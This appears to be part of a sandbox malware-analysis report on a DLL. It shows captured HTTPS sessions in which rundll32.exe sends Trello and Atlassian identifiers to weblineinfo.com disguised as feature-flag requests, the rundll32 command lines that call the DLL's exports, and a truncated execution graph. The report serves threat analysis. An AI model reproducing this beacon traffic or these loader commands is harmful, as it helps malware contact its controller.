    2024-08-09 14:18:45 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:18:46 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:46 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:46 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    9 | 192.168.2.5 | 49721 | 62.192.173.45 | 443 | 6112 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:18:47 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:18:47 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:18:48 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:18:47 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:18:48 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    10 | 192.168.2.5 | 49722 | 62.192.173.45 | 443 | 3480 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:19:07 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:19:07 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 33 39 32 34 32 37 37 61 36 32 36 33 35 39 61 37 35 33 63 65 32 32 66 66 31 31 62 61 32 38 34 33 31 65 34 33 66 33 63 37 30 32 36 39 37 31 65 66 34 30 37 65 37 65 30 64 62 64 35 63 31 39 33
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad77893924277a626359a753ce22ff11ba28431e43f3c7026971ef407e7e0dbd5c193
    2024-08-09 14:19:07 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:19:07 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:19:07 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}


    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
    11 | 192.168.2.5 | 49723 | 62.192.173.45 | 443 | 6112 | C:\Windows\System32\rundll32.exe
    Timestamp | Bytes transferred | Direction | Data
    2024-08-09 14:19:09 UTC | 387 | OUT | POST /flags/api/v2/frontend/experimentValues HTTP/1.1
    Accept: */*
    Content-Type: application/json
    X-Client-Name: feature-gate-js-client
    X-Client-Version: 4.8.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: weblineinfo.com
    Content-Length: 335
    Connection: Keep-Alive
    Cache-Control: no-cache
    2024-08-09 14:19:09 UTC | 335 | OUT | Data Raw: 7b 22 69 64 65 6e 74 69 66 69 65 72 73 22 3a 7b 22 74 72 65 6c 6c 6f 55 73 65 72 49 64 22 3a 22 30 36 65 66 31 39 64 35 37 63 22 2c 22 61 74 6c 61 73 73 69 61 6e 41 63 63 6f 75 6e 74 49 64 22 3a 22 35 32 33 32 33 31 3a 36 66 35 64 66 35 34 35 2d 64 35 34 64 2d 34 36 64 33 2d 38 65 31 34 2d 32 65 31 63 33 34 31 35 32 39 65 31 22 7d 2c 22 63 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 22 2c 22 64 65 76 22 3a 22 31 31 64 35 34 35 61 37 65 30 39 66 34 37 35 37 63 63 65 32 31 62 62 66 35 39 63 36 32 35 38 66 38 61 64 37 37 38 39 34 39 32 34 32 36 62 61 32 35 32 32 33 39 38 30 35 33 61 38 37 35 61 66 36 31 31 62 35 39 66 35 32 65 32 34 32 33 38 37 30 35 37 39 35 36 33 38 31 36 33 65 36 39 33 64 35 64 37 64 37 39 39
    Data Ascii: {"identifiers":{"trelloUserId":"06ef19d57c","atlassianAccountId":"523231:6f5df545-d54d-46d3-8e14-2e1c341529e1"},"customAttributes":{"locale":"en","dev":"11d545a7e09f4757cce21bbf59c6258f8ad7789492426ba2522398053a875af611b59f52e24238705795638163e693d5d7d799
    2024-08-09 14:19:10 UTC | 302 | IN | HTTP/1.1 200 OK
    Atl-Traceid: bd5dc8037c884e41b347a3eb314810ca
    Content-Length: 41
    Content-Type: application/json
    Date: Fri, 09 Aug 2024 14:19:09 GMT
    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
    Server: AtlassianEdge
    Connection: close
    2024-08-09 14:19:10 UTC | 41 | IN | Data Raw: 7b 22 73 75 63 63 65 73 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 22 3a 22 75 73 65 72 5f 6e 6f 74 5f 66 6f 75 6e 64 22 7d
    Data Ascii: {"succes":false,"error":"user_not_found"}



    Target ID:0
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\loaddll64.exe
    Wow64 process (32bit):false
    Commandline:loaddll64.exe "C:\Users\user\Desktop\10kmr9d7.dll"
    Imagebase:0x7ff7b1750000
    File size:165'888 bytes
    MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:1
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6d64d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:2
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
    Imagebase:0x7ff71aa70000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:3
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_CancelAllOperations
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:4
    Start time:10:17:03
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",#1
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:6
    Start time:10:17:06
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Create
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:7
    Start time:10:17:09
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe C:\Users\user\Desktop\10kmr9d7.dll,ActionsShim_Destroy
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:8
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_CancelAllOperations
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:9
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Create
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:10
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Destroy
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:11
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetTxtReplaceData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:12
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueReplaceData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:13
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetRegValueDeleteData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:14
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_GetBasicData
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:15
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_Threat_Delete
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:16
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ShutdownTargetDLL
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:17
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetMaxLogLevel
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:18
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_SetLogCallback
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:19
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActionsV2
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:20
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessThreatActions
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:21
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_ProcessPendingActionsAfterReboot
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:22
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_PrepareUpdate
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:23
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_IsDLLNewlyLoaded
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:24
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_InitTargetDLL
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:25
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMinorAPIVersion
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:26
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetMajorAPIVersion
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:27
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreatsV2
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:28
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_GetDetectedThreats
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true

    Target ID:29
    Start time:10:17:12
    Start date:09/08/2024
    Path:C:\Windows\System32\rundll32.exe
    Wow64 process (32bit):false
    Commandline:rundll32.exe "C:\Users\user\Desktop\10kmr9d7.dll",ActionsShim_FinishUpdate
    Imagebase:0x7ff6677c0000
    File size:71'680 bytes
    MD5 hash:EF3179D498793BF4234F708D3BE28633
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Has exited:true


      Execution Graph

      Execution Coverage:1.6%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:6.2%
      Total number of Nodes:948
      Total number of Limit Nodes:17
      execution_graph: serialized node/edge listing of the interactive execution graph (948 nodes, 17 limit nodes), truncated in this capture and not reproduced here.
      Windows API calls named in the graph nodes: InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, LoadLibraryExW, GetProcAddress, FreeLibrary, GetLastError, SetLastError, MultiByteToWideChar, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, WakeAllConditionVariable, RaiseException, RtlPcToFileHeader, IsProcessorFeaturePresent, GetCurrentProcess, TerminateProcess, FlsGetValue, FlsSetValue, TlsGetValue, TlsSetValue, HeapFree, NtAllocateVirtualMemory, NtProtectVirtualMemory.
      The remaining nodes are CRT/STL internals (e.g. _invalid_parameter_noinfo_noreturn, memcpy_s, std::_Lockit, std::_Facet_Register, __crtLCMapStringW, _Getctype, _Wcrtomb, Concurrency::cancel_current_task).
EnterCriticalSection 15352->15358 15355 180046d7b 15353->15355 15359 180046d87 15354->15359 15356 18003c3a0 LeaveCriticalSection 15355->15356 15356->15359 15357 180046dc6 15357->15051 15358->15361 15359->15357 15360 180036db0 29 API calls 15359->15360 15362 180046db9 15360->15362 15361->15355 15463 180046830 15361->15463 15362->15051 15364 1800592b9 15363->15364 15365 180059269 15363->15365 15364->15054 15366 1800592a2 15365->15366 15469 180099040 15365->15469 15473 18004c1e0 15366->15473 15370 18005949c 15369->15370 15371 1800594a7 15370->15371 15372 1800594ce 15370->15372 15373 180036db0 29 API calls 15371->15373 15374 1800594d5 15372->15374 15375 1800594fd 15372->15375 15376 1800594c6 15373->15376 15377 180036db0 29 API calls 15374->15377 15379 180059521 15375->15379 15380 18005954c 15375->15380 15376->15059 15378 1800594f5 15377->15378 15378->15059 15381 180036db0 29 API calls 15379->15381 15383 180032650 29 API calls 15380->15383 15386 18005956f 15380->15386 15382 18005953f 15381->15382 15382->15059 15384 180059562 15383->15384 15385 180032650 29 API calls 15384->15385 15384->15386 15385->15386 15386->15059 15388 180058db0 15387->15388 15389 180058dc3 15388->15389 15390 180058df0 15388->15390 15391 180036db0 29 API calls 15389->15391 15392 180058df5 15390->15392 15397 180058e22 15390->15397 15393 180058de3 15391->15393 15394 180036db0 29 API calls 15392->15394 15393->15062 15396 180058e15 15394->15396 15395 180058e27 15395->15062 15396->15062 15397->15395 15398 180058e84 15397->15398 15399 180058ebf 15397->15399 15401 180058e95 15398->15401 15493 18004c240 15398->15493 15400 18004c1e0 13 API calls 15399->15400 15404 180058eb4 15400->15404 15415 180058fee ctype 15401->15415 15498 18004c150 15401->15498 15405 180058ed8 15404->15405 15410 180058f0c 15404->15410 15404->15415 15406 180058ee9 15405->15406 15407 18005a2f0 29 API calls 15405->15407 15408 180059ca0 29 API calls 15406->15408 15406->15415 15407->15406 15409 180058f02 15408->15409 15412 1800322c0 29 API 
calls 15409->15412 15409->15415 15416 180058f7e 15409->15416 15410->15409 15411 18003c550 13 API calls 15410->15411 15411->15409 15413 180058f6c 15412->15413 15414 1800322c0 29 API calls 15413->15414 15413->15415 15414->15416 15415->15062 15416->15415 15417 180036db0 29 API calls 15416->15417 15417->15415 15419 18005a2fc 15418->15419 15420 18005a307 15419->15420 15421 18005a32d 15419->15421 15422 180036db0 29 API calls 15420->15422 15423 18005a337 15421->15423 15427 18005a35f 15421->15427 15424 18005a325 15422->15424 15425 180036db0 29 API calls 15423->15425 15424->15067 15426 18005a357 15425->15426 15426->15067 15428 180036db0 29 API calls 15427->15428 15430 18005a3ae 15427->15430 15429 18005a3a1 15428->15429 15429->15067 15430->15067 15432 180059caa 15431->15432 15433 180036db0 29 API calls 15432->15433 15434 180059ce6 15432->15434 15435 180059d19 15433->15435 15434->15061 15435->15061 15437 18003265a 15436->15437 15438 18003269c 15437->15438 15439 180036db0 29 API calls 15437->15439 15438->15063 15440 180032695 15439->15440 15440->15063 15442 1800322d5 15441->15442 15444 1800322f6 ctype 15442->15444 15506 180032f50 15442->15506 15444->15048 15446 18003ceda 15445->15446 15447 18003cfce 15446->15447 15448 18003d880 29 API calls 15446->15448 15449 180106610 Concurrency::cancel_current_task 8 API calls 15447->15449 15453 18003cf09 15448->15453 15450 180039ee4 15449->15450 15450->15057 15450->15058 15451 18003cf96 15452 18003c3a0 LeaveCriticalSection 15451->15452 15454 18003cf94 15452->15454 15453->15447 15453->15451 15459 18003cf6d 15453->15459 15454->15447 15455 18003cfd5 15454->15455 15456 18003cfb0 15454->15456 15513 18003d6b0 15455->15513 15457 180036db0 29 API calls 15456->15457 15457->15447 15460 18003c3a0 LeaveCriticalSection 15459->15460 15460->15454 15461 18003d6b0 29 API calls 15462 18003cff5 15461->15462 15462->15447 15462->15461 15465 180046840 15463->15465 15464 1800468ad 15464->15348 15465->15464 15466 18007cf10 2 API calls 15465->15466 15467 180046899 
15466->15467 15468 18003d0e0 29 API calls 15467->15468 15468->15464 15471 180099049 15469->15471 15472 1800990b4 15469->15472 15471->15472 15481 18003c240 15471->15481 15472->15366 15474 18004c1e5 15473->15474 15480 18004c211 15473->15480 15485 180032040 15474->15485 15476 18004c1ff 15477 180032040 13 API calls 15476->15477 15478 18004c208 15477->15478 15479 180032040 13 API calls 15478->15479 15479->15480 15480->15364 15482 18003c245 15481->15482 15484 18003c271 15481->15484 15483 18003c250 DeleteCriticalSection 15482->15483 15483->15484 15484->15472 15486 180032045 15485->15486 15487 180032078 15485->15487 15486->15487 15489 18003c550 15486->15489 15487->15476 15490 18003c555 15489->15490 15492 18003c5bb 15489->15492 15491 18011bf80 ctype 13 API calls 15490->15491 15491->15492 15492->15487 15494 18004c24c 15493->15494 15495 180036db0 29 API calls 15494->15495 15497 18004c294 15494->15497 15496 18004c28c 15495->15496 15496->15401 15497->15401 15499 18004c160 